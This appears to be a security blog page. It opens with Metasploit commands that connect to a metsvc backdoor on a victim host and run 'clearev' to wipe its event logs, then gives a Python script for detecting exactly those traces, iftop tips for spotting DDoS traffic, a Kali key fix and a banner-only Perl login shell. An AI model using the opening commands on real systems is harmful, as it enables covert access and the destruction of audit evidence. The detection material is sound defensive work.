Connect to the metsvc (suppose the victim's IP address is 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clear all event logs:
meterpreter>clearev
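The host-side traces the steps above leave behind are what a defender looks for: a new service (metsvc persistence) and event logs being cleared (clearev wipes Application, System and Security together). The triage below is an added example, not from the post or from Metasploit; the event records are constructed in the shape of exported Windows event log entries, and the assumption that the metsvc binary sits under a user-writable path is labelled in the code.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Windows event IDs: 7045 = new service installed (System log),
# 1102 = Security log cleared, 104 = System/Application log cleared.
NEW_SERVICE, SECURITY_CLEARED, LOG_CLEARED = 7045, 1102, 104
# Assumption: a service binary under one of these paths is not a vendor install.
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\users\\")

def triage(events: List[Dict]) -> List[str]:
    findings, clears = [], []
    for e in sorted(events, key=lambda x: x["time"]):
        if e["id"] == NEW_SERVICE:
            path = e.get("image_path", "").lower()
            if any(p in path for p in USER_WRITABLE):
                findings.append(f"suspicious service {e['service']} -> {e['image_path']}")
        elif e["id"] in (SECURITY_CLEARED, LOG_CLEARED):
            t = datetime.fromisoformat(e["time"])
            clears.append((t, e["log"]))
            findings.append(f"{e['log']} log cleared by {e.get('user', '?')} at {e['time']}")
    # clearev empties several logs within seconds: two or more distinct logs
    # cleared inside one minute is the pattern to alert on, not a lone 1102.
    for t, _ in clears:
        logs = {l for u, l in clears if t <= u <= t + timedelta(seconds=60)}
        if len(logs) >= 2:
            findings.append(f"mass log clearing (clearev-like) at {t.isoformat()}: {sorted(logs)}")
            break
    return findings

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 7045, "time": "2018-05-21T10:02:11", "log": "System", "service": "metsvc",
     "image_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\abc\\metsvc.exe"},
    {"id": 7045, "time": "2018-05-21T10:05:00", "log": "System", "service": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
    {"id": 1102, "time": "2018-05-21T10:07:30", "log": "Security", "user": "bob"},
    {"id": 104, "time": "2018-05-21T10:07:31", "log": "System", "user": "bob"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```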
Saturday, April 21, 2018
Suggest we use iftop instead of iptraf to identify DDoS
Reference: https://www.slashroot.in/linux-iptraf-and-iftop-monitor-and-analyse-network-traffic-and-bandwidth
Usage:
iftop -i INTERFACE
Example:
iftop -i eth1
iftop automatically sorts the connections by bandwidth usage, with the heaviest at the top, so a flood source stands out immediately.
The shortcut "p" shows the source port and destination port of each connection.
The last three columns on the right show each connection's average bandwidth over the last 2, 10, and 40 seconds.
Finally, the shortcut "q" exits the program.
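How those three columns come about, as an added example (not from the post or from iftop itself): each connection's byte samples are summed over a trailing 2 s, 10 s and 40 s window, converted to bits per second, and the table is sorted by the 2 s column so a flood rises to the top. The flow records below are constructed.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

Record = Tuple[float, str, str, int]   # (timestamp in seconds, src, dst, bytes)

def rates(records: List[Record], now: float,
          windows: Tuple[int, ...] = (2, 10, 40)) -> List[Tuple[str, Tuple[float, ...]]]:
    """Return [(connection, (bits/s over each window, ...))], heaviest 2 s rate first."""
    per_conn: Dict[str, List[Tuple[float, int]]] = defaultdict(list)
    for ts, src, dst, nbytes in records:
        per_conn[f"{src} => {dst}"].append((ts, nbytes))
    table = []
    for conn, samples in per_conn.items():
        # Average over the trailing window: bytes inside (now - w, now], times 8, over w seconds.
        row = tuple(sum(b for ts, b in samples if now - w < ts <= now) * 8 / w
                    for w in windows)
        table.append((conn, row))
    table.sort(key=lambda r: r[1][0], reverse=True)
    return table

# Constructed sample: one host sending 1000 bytes every 0.1 s for the last 2 s
# (a burst), another sending 500 bytes once a second for 40 s (steady traffic).
NOW = 100.0
SAMPLE = [(NOW - i * 0.1, "10.9.9.9", "192.168.0.88", 1000) for i in range(20)]
SAMPLE += [(NOW - i, "192.168.0.5", "192.168.0.88", 500) for i in range(40)]

if __name__ == "__main__":
    for conn, (r2, r10, r40) in rates(SAMPLE, NOW):
        print(f"{conn:30} {r2:10.0f} {r10:10.0f} {r40:10.0f} bit/s")
```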
Sunday, April 15, 2018
Solve the key issue happening when updating sources by using apt-get
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
Retrieved from https://www.kali.org/news/kali-linux-2018-1-release/
If the command above still does not work, please execute the commands below:
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Many thanks for the guidance of Frank, my coworker working at CCBNY.
A dumb shell
#!/usr/bin/perl -w
# Path: /bin/dumb_shell.pl
# A login shell for users who must not get any real privilege: it only
# prints a banner in a loop and never offers a command prompt.
$| = 1;                 # autoflush STDOUT
while (1) {
    system('clear');
    print "You have logged in successfully!\n";
    sleep(5);
}